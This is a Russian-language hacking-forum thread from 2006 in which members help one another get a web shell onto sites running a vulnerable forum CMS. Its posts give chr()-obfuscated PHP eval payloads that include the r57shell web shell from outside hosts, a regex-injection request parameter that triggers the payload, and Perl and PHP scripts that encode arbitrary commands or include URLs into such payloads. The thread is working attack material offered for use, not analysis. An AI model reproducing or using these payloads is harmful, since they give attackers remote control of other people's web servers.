HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу вместо Shell сайт производителя
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

вместо Shell сайт производителя
  #1  
Старый 04.10.2006, 01:50
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
С нами:
10770849

Репутация: 23
По умолчанию вместо Shell сайт производителя
дело вообщем татакое:

нашол форум 2.1.3 , создал топик с таким содержимым

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

после чего через поиск нашол свои топ и добавил
&lastdate=z|eval.*?%20//)%23e%00

но странно не получил долгожданный шелл , а почемуто подгрузилась страница производителя , как будто шелла у них нет на сервере. Помогите в чем может быть дело.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 04.10.2006, 02:37
^ацтанЬ^
Новичок
Регистрация: 04.08.2006
Сообщений: 23
С нами:
10404052

Репутация: 1
По умолчанию
Хы ты че тока узнал? воид закрылся, все файлы тоже закрыты
нада расшифровать код этот и вставить свой шел в .тхт формате и потом будет работать се
Вот тебе код чеб зашифровать

PHP код:
#!usr/bin/perl
while ()
{
   print "\r\nCommand for encode or 'exit' for exit ";
   while(<STDIN>)
    {
       $cmd=$_;
       chomp($cmd);
       exit() if ($cmd eq 'exit');
       last;
    }
 $len length($cmd);
 for ($i=0$i<$len$i++)
    {
  $s substr($cmd,$i,1);
  $out.="chr(".ord($s).")";
  if($i != $len-1)
    {
     $out.=".";
     }
   
 }
print "eval(system(".$out.").chr(59).exit()); //";
$out "";

а зашифрованно там это:
PHP код:
eval("include \"http://rst.void.ru/download/r57shell.txt\";/*"); 
 
Ответить с цитированием

  #3  
Старый 04.10.2006, 04:03
qPhoenix
Banned
Регистрация: 15.12.2005
Сообщений: 95
С нами:
10738406

Репутация: 132
По умолчанию
Спрашивается, зачем усложнять себе жизнь?
Вот код на ПХП, куда вставлять адрес - думаю видно...
PHP код:
<?php
$str="include \"http://rst.void.ru/download/r57shell.txt.gz\";/*";// */
echo "eval( ";
for($i=0;$i<strlen($str);$i++)
{
    echo "chr(".ord($str[$i])."). ";
}
echo "chr(".ord(" ").") ); //";
?
Кстать, файлы на рст не закрыты, а просто у некоторых изменились имена и случилось это еще до закрытия проекта...

rst.void.ru/download/r57shell.txt.gz

хоть и gz - канает без проблем...
 
Ответить с цитированием

  #4  
Старый 04.10.2006, 08:17
^ацтанЬ^
Новичок
Регистрация: 04.08.2006
Сообщений: 23
С нами:
10404052

Репутация: 1
По умолчанию
Ну так всеравно надо зашифрововать опять
 
Ответить с цитированием

  #5  
Старый 04.10.2006, 10:43
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
С нами:
10719686

Репутация: 1833
По умолчанию
Вот пользуйся этим :
PHP код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(104). chr(105). chr(109). chr(97). chr(115). chr(50). chr(48). chr(48). chr(53). chr(46). chr(110). chr(97). chr(114). chr(111). chr(100). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(112). chr(104). chr(112). chr(34). chr(59). chr(47). chr(42). chr(32) ); // 
 
Ответить с цитированием

  #6  
Старый 04.10.2006, 23:13
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
С нами:
11087066

Репутация: 561


По умолчанию
Пльзуйся своим. Перевести можно тут http://www.paulschou.com/tools/xlate/
__________________
Full DNS report
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Сделай сайт своей мечты SVipeR Мировые новости. Обсуждения. 4 12.09.2006 10:15
Сайт МТС BlackCats Уязвимости 1 15.05.2006 15:42
Сайт SCO [www.sco.com] деликатно взломали ФРАЙ Мировые новости. Обсуждения. 0 01.12.2004 00:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.